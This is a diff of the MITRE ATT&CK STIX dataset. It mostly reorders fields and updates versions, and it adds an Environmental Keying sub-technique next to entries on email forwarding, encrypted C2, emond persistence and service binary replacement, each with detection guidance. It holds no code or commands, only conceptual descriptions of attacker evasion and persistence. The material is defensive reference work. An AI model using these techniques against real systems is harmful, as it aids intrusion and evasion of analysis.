- "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_contributors": [
- "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
- ]
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -8984,10 +9338,15 @@
],
"modified": "2020-03-24T18:29:48.994Z",
"created": "2020-02-19T18:54:47.103Z",
- "x_mitre_platforms": [
- "Office 365",
- "Windows"
+ "x_mitre_contributors": [
+ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
"x_mitre_data_sources": [
"Process use of network",
"Process monitoring",
@@ -8995,14 +9354,9 @@
"Mail server",
"Office 365 trace logs"
],
- "x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+ "x_mitre_platforms": [
+ "Office 365",
+ "Windows"
]
},
{
@@ -9078,30 +9432,32 @@
],
"modified": "2020-03-24T21:37:25.307Z",
"created": "2020-01-24T15:15:13.426Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
+ "x_mitre_data_sources": [
+ "File monitoring"
],
"x_mitre_contributors": [
"Ivan Sinyakov"
],
- "x_mitre_data_sources": [
- "File monitoring"
- ],
- "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
- "id": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
- "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
- "name": "Encrypted Channel",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-03-16T15:33:01.739Z",
+ "modified": "2020-03-30T00:37:16.809Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -9124,15 +9480,13 @@
"source_name": "University of Birmingham C2"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-30T00:37:16.809Z",
- "created": "2020-03-16T15:33:01.739Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Encrypted Channel",
+ "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
+ "id": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": false,
"x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
@@ -9224,19 +9578,8 @@
],
"modified": "2020-03-29T02:07:27.676Z",
"created": "2019-04-18T11:00:55.862Z",
- "x_mitre_data_sources": [
- "SSL/TLS inspection",
- "Web logs",
- "Web application firewall logs",
- "Network intrusion detection system",
- "Network protocol analysis",
- "Network device logs",
- "Netflow/Enclave netflow"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_impact_type": [
- "Availability"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -9248,8 +9591,102 @@
"Azure AD",
"SaaS"
],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
- "x_mitre_is_subtechnique": false
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "SSL/TLS inspection",
+ "Web logs",
+ "Web application firewall logs",
+ "Network intrusion detection system",
+ "Network protocol analysis",
+ "Network device logs",
+ "Netflow/Enclave netflow"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1480.001",
+ "url": "https://attack.mitre.org/techniques/T1480/001"
+ },
+ {
+ "source_name": "EK Clueless Agents",
+ "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf",
+ "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019."
+ },
+ {
+ "source_name": "Kaspersky Gauss Whitepaper",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf",
+ "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Proofpoint Router Malvertising",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices",
+ "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019."
+ },
+ {
+ "source_name": "EK Impeding Malware Analysis",
+ "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf",
+ "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019."
+ },
+ {
+ "source_name": "Environmental Keyed HTA",
+ "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/",
+ "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019."
+ },
+ {
+ "source_name": "Ebowla: Genetic Malware",
+ "url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf",
+ "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019."
+ },
+ {
+ "source_name": "Demiguise Guardrail Router Logo",
+ "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js",
+ "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Environmental Keying",
+ "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
+ "id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-24T18:52:12.719Z",
+ "created": "2020-06-23T22:28:28.041Z",
+ "x_mitre_contributors": [
+ "Nick Carr, FireEye"
+ ],
+ "x_mitre_detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+ "x_mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host forensic analysis",
+ "Signature-based detection",
+ "Static file analysis"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9277,13 +9714,11 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T21:37:25.477Z",
+ "modified": "2020-07-09T13:55:51.501Z",
"created": "2020-01-22T21:04:23.285Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
"x_mitre_data_sources": [
"API monitoring",
"Windows event logs",
@@ -9298,9 +9733,11 @@
"DLL monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9344,24 +9781,24 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-23T19:49:17.544Z",
+ "modified": "2020-05-04T19:18:36.254Z",
"created": "2020-01-19T16:54:28.516Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
"x_mitre_contributors": [
- "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)"
+ "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
],
- "x_mitre_data_sources": [
- "Office 365 audit logs"
- ],
- "x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+ "x_mitre_data_sources": [
+ "Office 365 audit logs"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -9405,35 +9842,35 @@
],
"modified": "2020-03-26T19:20:23.030Z",
"created": "2020-03-13T11:12:18.558Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire",
- "Stefan Kanthak"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "File monitoring"
- ],
- "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
"x_mitre_effective_permissions": [
"Administrator",
"User",
"SYSTEM"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "File monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire",
+ "Stefan Kanthak"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
{
- "external_id": "T1480",
"source_name": "mitre-attack",
+ "external_id": "T1480",
"url": "https://attack.mitre.org/techniques/T1480"
},
{
@@ -9442,39 +9879,9 @@
"description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019."
},
{
- "source_name": "EK Clueless Agents",
- "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf",
- "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019."
- },
- {
- "source_name": "Kaspersky Gauss Whitepaper",
- "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf",
- "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019."
- },
- {
- "source_name": "Proofpoint Router Malvertising",
- "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices",
- "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019."
- },
- {
- "source_name": "EK Impeding Malware Analysis",
- "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf",
- "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019."
- },
- {
- "source_name": "Environmental Keyed HTA",
- "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/",
- "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019."
- },
- {
- "source_name": "Ebowla: Genetic Malware",
- "url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf",
- "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019."
- },
- {
- "source_name": "Demiguise Guardrail Router Logo",
- "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js",
- "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019."
+ "source_name": "FireEye Outlook Dec 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html",
+ "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020."
}
],
"object_marking_refs": [
@@ -9482,7 +9889,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Execution Guardrails",
- "description": "Execution guardrails constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. \n\nGuardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail that includes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use guardrails and environmental keying to help protect their TTPs and evade detection. For example, environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.",
+ "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
"id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -9491,30 +9898,31 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2019-07-19T14:59:44.034Z",
+ "modified": "2020-06-24T18:52:12.956Z",
"created": "2019-01-31T02:10:08.261Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Nick Carr, FireEye"
- ],
- "x_mitre_data_sources": [
- "Process monitoring"
- ],
- "x_mitre_detection": "Detecting the action of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
"x_mitre_defense_bypassed": [
"Anti-virus",
"Host forensic analysis",
"Signature-based detection",
- "Static File Analysis"
+ "Static file analysis"
],
- "x_mitre_version": "1.0"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+ "x_mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Nick Carr, FireEye"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -9550,17 +9958,7 @@
],
"modified": "2020-03-28T00:50:31.548Z",
"created": "2017-05-31T21:30:44.720Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_contributors": [
- "Alfredo Abarca"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_network_requirements": true,
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_version": "1.2",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -9568,7 +9966,17 @@
"Netflow/Enclave netflow",
"Network protocol analysis"
],
- "x_mitre_version": "1.2"
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_network_requirements": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_contributors": [
+ "Alfredo Abarca"
+ ],
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -9599,21 +10007,21 @@
],
"modified": "2020-03-28T00:45:51.014Z",
"created": "2020-03-15T15:34:30.767Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
